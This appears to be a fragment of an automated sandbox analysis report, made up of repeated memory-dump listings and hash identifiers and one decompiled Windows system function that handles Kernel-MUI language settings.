                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                                    • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                                    • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                                                    • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                                    • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                    • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                    • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                    • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                    • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                    • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                    • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                    			E00868788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				short* _v12;
                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                    				void* _t216;
                                                                                                                                                                                    				intOrPtr _t231;
                                                                                                                                                                                    				short* _t235;
                                                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                                                    				short* _t261;
                                                                                                                                                                                    				intOrPtr _t284;
                                                                                                                                                                                    				intOrPtr _t288;
                                                                                                                                                                                    				void* _t314;
                                                                                                                                                                                    				signed int _t318;
                                                                                                                                                                                    				short* _t319;
                                                                                                                                                                                    				intOrPtr _t321;
                                                                                                                                                                                    				void* _t328;
                                                                                                                                                                                    				void* _t329;
                                                                                                                                                                                    				char* _t332;
                                                                                                                                                                                    				signed int _t333;
                                                                                                                                                                                    				signed int* _t334;
                                                                                                                                                                                    				void* _t335;
                                                                                                                                                                                    				void* _t338;
                                                                                                                                                                                    				void* _t339;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t328 = __edx;
                                                                                                                                                                                    				_t322 = __ecx;
                                                                                                                                                                                    				_t318 = 0;
                                                                                                                                                                                    				_t334 = _a4;
                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                    				_v52 = 0;
                                                                                                                                                                                    				if(_t334 == 0) {
                                                                                                                                                                                    					_t329 = 0xc000000d;
                                                                                                                                                                                    					L49:
                                                                                                                                                                                    					_t334[0x11] = _v56;
                                                                                                                                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                                                    					_t334[0x12] = _v60;
                                                                                                                                                                                    					_t334[0x13] = _v28;
                                                                                                                                                                                    					_t334[0x17] = _v20;
                                                                                                                                                                                    					_t334[0x16] = _v48;
                                                                                                                                                                                    					_t334[0x18] = _v40;
                                                                                                                                                                                    					_t334[0x14] = _v32;
                                                                                                                                                                                    					_t334[0x15] = _v52;
                                                                                                                                                                                    					return _t329;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_v56 = 0;
                                                                                                                                                                                    				if(E00868460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                    					_v56 = 1;
                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                    						_t207 = E0084E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                                                    					E0086718A(_t207);
                                                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                                    				if(E00868460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                    					_t333 =  *_v8;
                                                                                                                                                                                    					_v60 = _t333;
                                                                                                                                                                                    					_t314 = E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    					_push(_t333);
                                                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                                                    					E0086718A(_t314);
                                                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t216 = E00868460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                                                    				_t332 = ";";
                                                                                                                                                                                    				if(_t216 < 0) {
                                                                                                                                                                                    					L17:
                                                                                                                                                                                    					if(E00868460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                    						L30:
                                                                                                                                                                                    						if(E00868460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                    							L46:
                                                                                                                                                                                    							_t329 = 0;
                                                                                                                                                                                    							L47:
                                                                                                                                                                                    							if(_v8 != _t318) {
                                                                                                                                                                                    								E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							if(_v28 != _t318) {
                                                                                                                                                                                    								if(_v20 != _t318) {
                                                                                                                                                                                    									E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                    									_v20 = _t318;
                                                                                                                                                                                    									_v40 = _t318;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							goto L49;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t231 = _v24;
                                                                                                                                                                                    						_t322 = _t231 + 4;
                                                                                                                                                                                    						_push(_t231);
                                                                                                                                                                                    						_v52 = _t322;
                                                                                                                                                                                    						E0086718A(_t231);
                                                                                                                                                                                    						if(_t322 == _t318) {
                                                                                                                                                                                    							_v32 = _t318;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_v32 = E0084E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_v32 == _t318) {
                                                                                                                                                                                    							_v52 = _t318;
                                                                                                                                                                                    							L58:
                                                                                                                                                                                    							_t329 = 0xc0000017;
                                                                                                                                                                                    							goto L47;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							E00842340(_v32, _v8, _v24);
                                                                                                                                                                                    							_v16 = _v32;
                                                                                                                                                                                    							_a4 = _t318;
                                                                                                                                                                                    							_t235 = E0085E679(_v32, _t332);
                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                    								_t319 = _t235;
                                                                                                                                                                                    								if(_t319 == 0) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								 *_t319 = 0;
                                                                                                                                                                                    								_t321 = _t319 + 2;
                                                                                                                                                                                    								E0084E2A8(_t322,  &_v68, _v16);
                                                                                                                                                                                    								if(E00865553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_v16 = _t321;
                                                                                                                                                                                    								_t235 = E0085E679(_t321, _t332);
                                                                                                                                                                                    								_pop(_t322);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t236 = _v16;
                                                                                                                                                                                    							if( *_v16 != _t319) {
                                                                                                                                                                                    								E0084E2A8(_t322,  &_v68, _t236);
                                                                                                                                                                                    								if(E00865553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							if(_a4 == 0) {
                                                                                                                                                                                    								E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                                                    								_v52 = _v52 & 0x00000000;
                                                                                                                                                                                    								_v32 = _v32 & 0x00000000;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                    								E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                    							_t318 = 0;
                                                                                                                                                                                    							goto L46;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t257 = _v24;
                                                                                                                                                                                    					_t322 = _t257 + 4;
                                                                                                                                                                                    					_push(_t257);
                                                                                                                                                                                    					_v40 = _t322;
                                                                                                                                                                                    					E0086718A(_t257);
                                                                                                                                                                                    					_t338 = _t335 + 4;
                                                                                                                                                                                    					if(_t322 == _t318) {
                                                                                                                                                                                    						_v20 = _t318;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_v20 = E0084E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v20 == _t318) {
                                                                                                                                                                                    						_v40 = _t318;
                                                                                                                                                                                    						goto L58;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						E00842340(_v20, _v8, _v24);
                                                                                                                                                                                    						_v16 = _v20;
                                                                                                                                                                                    						_a4 = _t318;
                                                                                                                                                                                    						_t261 = E0085E679(_v20, _t332);
                                                                                                                                                                                    						_t335 = _t338 + 0x14;
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							_v12 = _t261;
                                                                                                                                                                                    							if(_t261 == _t318) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v12 = _v12 + 2;
                                                                                                                                                                                    							 *_v12 = 0;
                                                                                                                                                                                    							E0084E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                    							if(E00865553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v16 = _v12;
                                                                                                                                                                                    							_t261 = E0085E679(_v12, _t332);
                                                                                                                                                                                    							_pop(_t322);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t269 = _v16;
                                                                                                                                                                                    						if( *_v16 != _t318) {
                                                                                                                                                                                    							E0084E2A8(_t322,  &_v68, _t269);
                                                                                                                                                                                    							if(E00865553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_a4 == _t318) {
                                                                                                                                                                                    							E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                    							_v40 = _t318;
                                                                                                                                                                                    							_v20 = _t318;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_v8 != _t318) {
                                                                                                                                                                                    							E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v8 = _t318;
                                                                                                                                                                                    						goto L30;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t284 = _v24;
                                                                                                                                                                                    				_t322 = _t284 + 4;
                                                                                                                                                                                    				_push(_t284);
                                                                                                                                                                                    				_v48 = _t322;
                                                                                                                                                                                    				E0086718A(_t284);
                                                                                                                                                                                    				_t339 = _t335 + 4;
                                                                                                                                                                                    				if(_t322 == _t318) {
                                                                                                                                                                                    					_v28 = _t318;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					_v28 = E0084E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				if(_v28 == _t318) {
                                                                                                                                                                                    					_v48 = _t318;
                                                                                                                                                                                    					goto L58;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					E00842340(_v28, _v8, _v24);
                                                                                                                                                                                    					_v16 = _v28;
                                                                                                                                                                                    					_a4 = _t318;
                                                                                                                                                                                    					_t288 = E0085E679(_v28, _t332);
                                                                                                                                                                                    					_t335 = _t339 + 0x14;
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						_v12 = _t288;
                                                                                                                                                                                    						if(_t288 == _t318) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v12 = _v12 + 2;
                                                                                                                                                                                    						 *_v12 = 0;
                                                                                                                                                                                    						E0084E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                    						if(E00865553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v16 = _v12;
                                                                                                                                                                                    						_t288 = E0085E679(_v12, _t332);
                                                                                                                                                                                    						_pop(_t322);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t296 = _v16;
                                                                                                                                                                                    					if( *_v16 != _t318) {
                                                                                                                                                                                    						E0084E2A8(_t322,  &_v68, _t296);
                                                                                                                                                                                    						if(E00865553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_a4 == _t318) {
                                                                                                                                                                                    						E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                                                    						_v48 = _t318;
                                                                                                                                                                                    						_v28 = _t318;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v8 != _t318) {
                                                                                                                                                                                    						E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}





































                                                                                                                                                                                    0x00868788
                                                                                                                                                                                    0x00868788
                                                                                                                                                                                    0x00868791
                                                                                                                                                                                    0x00868794
                                                                                                                                                                                    0x00868798
                                                                                                                                                                                    0x0086879b
                                                                                                                                                                                    0x0086879e
                                                                                                                                                                                    0x008687a1
                                                                                                                                                                                    0x008687a4
                                                                                                                                                                                    0x008687a7
                                                                                                                                                                                    0x008687aa
                                                                                                                                                                                    0x008687af
                                                                                                                                                                                    0x008b1ad3
                                                                                                                                                                                    0x00868b0a
                                                                                                                                                                                    0x00868b0d
                                                                                                                                                                                    0x00868b13
                                                                                                                                                                                    0x00868b19
                                                                                                                                                                                    0x00868b1f
                                                                                                                                                                                    0x00868b25
                                                                                                                                                                                    0x00868b2b
                                                                                                                                                                                    0x00868b31
                                                                                                                                                                                    0x00868b37
                                                                                                                                                                                    0x00868b3d
                                                                                                                                                                                    0x00868b46
                                                                                                                                                                                    0x00868b46
                                                                                                                                                                                    0x008687c6
                                                                                                                                                                                    0x008687d0
                                                                                                                                                                                    0x008b1ae0
                                                                                                                                                                                    0x008b1ae6
                                                                                                                                                                                    0x008b1af8
                                                                                                                                                                                    0x008b1af8
                                                                                                                                                                                    0x008b1afd
                                                                                                                                                                                    0x008b1afe
                                                                                                                                                                                    0x008b1b01
                                                                                                                                                                                    0x008b1b06
                                                                                                                                                                                    0x008b1b06
                                                                                                                                                                                    0x008687d6
                                                                                                                                                                                    0x008687f2
                                                                                                                                                                                    0x008687f7
                                                                                                                                                                                    0x00868807
                                                                                                                                                                                    0x0086880a
                                                                                                                                                                                    0x0086880f
                                                                                                                                                                                    0x00868810
                                                                                                                                                                                    0x00868813
                                                                                                                                                                                    0x00868818
                                                                                                                                                                                    0x00868818
                                                                                                                                                                                    0x0086882c
                                                                                                                                                                                    0x00868831
                                                                                                                                                                                    0x00868838
                                                                                                                                                                                    0x00868908
                                                                                                                                                                                    0x00868920
                                                                                                                                                                                    0x008689f0
                                                                                                                                                                                    0x00868a08
                                                                                                                                                                                    0x00868af6
                                                                                                                                                                                    0x00868af6
                                                                                                                                                                                    0x00868af8
                                                                                                                                                                                    0x00868afb
                                                                                                                                                                                    0x008b1beb
                                                                                                                                                                                    0x008b1beb
                                                                                                                                                                                    0x00868b04
                                                                                                                                                                                    0x008b1bf8
                                                                                                                                                                                    0x008b1c0e
                                                                                                                                                                                    0x008b1c13
                                                                                                                                                                                    0x008b1c16
                                                                                                                                                                                    0x008b1c16
                                                                                                                                                                                    0x008b1bf8
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00868b04
